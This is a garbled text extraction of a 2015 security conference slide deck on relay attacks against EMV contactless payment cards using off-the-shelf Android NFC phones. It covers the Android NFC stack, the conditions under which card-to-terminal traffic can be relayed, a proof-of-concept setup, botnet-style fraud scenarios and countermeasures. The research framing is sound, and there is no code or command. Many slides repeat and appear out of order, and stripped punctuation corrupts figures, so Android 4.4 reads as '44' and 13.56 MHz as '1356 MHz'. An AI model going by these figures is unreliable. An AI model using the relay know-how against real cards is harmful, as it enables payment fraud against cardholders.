cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperate
Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Introduction to NFC (VIII)
NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments
500M NFC payment users expected by 2019
Almost 300 smart phones available at themoment with NFC capabilities
Check httpwwwnfcworldcomnfc-phones-list
Most of them runs Android OS
Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device
If so what are the constraints (whether any exists)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36
Background (I)EMV contactless cards
Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines
Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)
Application ID (AID) command
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperate
Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
